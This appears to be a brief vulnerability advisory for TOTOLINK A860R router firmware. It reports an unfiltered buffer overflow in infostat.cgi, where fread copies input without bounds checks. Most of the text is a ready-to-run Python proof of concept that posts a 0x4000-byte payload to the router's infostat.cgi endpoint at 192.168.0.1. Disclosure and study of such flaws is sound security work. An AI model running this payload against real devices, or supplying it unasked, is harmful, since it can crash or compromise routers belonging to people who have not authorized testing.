TOTOLINK:A860R V4.1.2cu.5182_B20201027
http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=62&ids=36
Parameters in infostat.cgi are not filtered, causing a buffer overflow vulnerability
The fread function copies data directly to the V11 register without filtering, causing a buffer overflow
import requests
data = {'a':'a'*0x4000}
res = requests.post("http://192.168.0.1/cgi-bin/infostat.cgi", data=data)
print(res.content)